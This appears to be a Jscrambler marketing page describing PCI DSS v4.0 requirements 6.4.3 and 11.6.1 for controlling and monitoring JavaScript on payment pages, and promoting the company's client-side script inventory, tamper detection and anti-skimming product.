The first requirement (6.4.3) is designed to minimize the attack surface and manage all JavaScript present in the Payment Page.
Comply with PCI DSS v4.0
Challenges
PCI DSS v4.0 contains two new requirements aimed at ensuring the integrity of payment pages on a website. The new requirements are mandatory after 31 March 2025. However, it is vital that merchants gain visibility, risk management capabilities, and control of JavaScript before the standard requires it. Criminals are using this attack now and it is expected that they will increase its frequency and sophistication before the new requirements become widely deployed throughout the payment ecosystem.
The second requirement (11.6.1) aims to detect tampering or unauthorized changes to the Payment Page and generate an alert when such changes are detected.
Solution
Jscrambler's solution allows easy and real-time visualization of any script that may represent a threat to the integrity of the user's data, immediately flagging all behaviors understood as undesirable or suspicious, to allow rapid response.
List of all vendors and scripts running on the payment page with compliance status;
Script verification and authorization process as well as corresponding logs;
Records of the technical analysis of the functionality of each script and justification for it;
Provide validation of the integrity of the scripts with tamper detection mechanisms and alerts;
Scripts behavior control and alerts on unauthorized modification of contents of the payment page;
HTTP header change detection and alerts of unauthorized modification
Jscrambler's Solution Offers Superior Protection
Traditional security tools can't adequately address the new payment page requirements in PCI DSS v4.0. Unlike Jscrambler's solution, which is purpose-built, they lack flexibility, manageability, visibility, and control.
Vulnerability assessments only look at a point in time, and scripts are always changing;
WAFs can't detect activity at the browser level and won’t prevent scripts from sending data out from the website;
Content Security Policy (CSP) has many gaps. For example, it doesn't enable you to control what the code does once it executes in the browser. It requires a lot of manual effort to configure and maintain;
Detect changes to existing first and third-party scripts.
Business Outcomes
Jscrambler helps you achieve compliance with the new requirements of PCI DSS v4.0. It provides you with visibility, risk management, and control of all JavaScript running on your website. The new requirements mandate that you maintain a full inventory of every script on your payment pages and validate the integrity of every script to ensure that those loaded into the consumer’s browser haven’t been tampered with. Jscrambler's solution goes one step further than the new requirements; it can be configured to automatically block all attempts to skim cardholder data from e-commerce transactions.
Preserve the functionality of the page and keep your e-commerce store open for business;
Create real-time alerts flagging changes to existing scripts;
Evaluate script changes to ensure they are not trying to steal cardholder data;
Reduce manual efforts required with traditional solutions;
Get audit-ready reports
About Jscrambler
Jscrambler is a leading authority in client-side security software. We defend enterprises from revenue and reputational harm caused by accidental or intentional interference with first- and third-party code. Our solution works continuously, in real-time, keeping organizations protected regardless of how frequently code may change. Jscrambler’s customers include the FORTUNE 500, retailers, airlines, banks and other enterprises whose success depends on safely engaging with their customers online. We keep these interactions secure so businesses can continue to innovate without fear of damaging their revenue, reputation, or ability to comply with regulations.
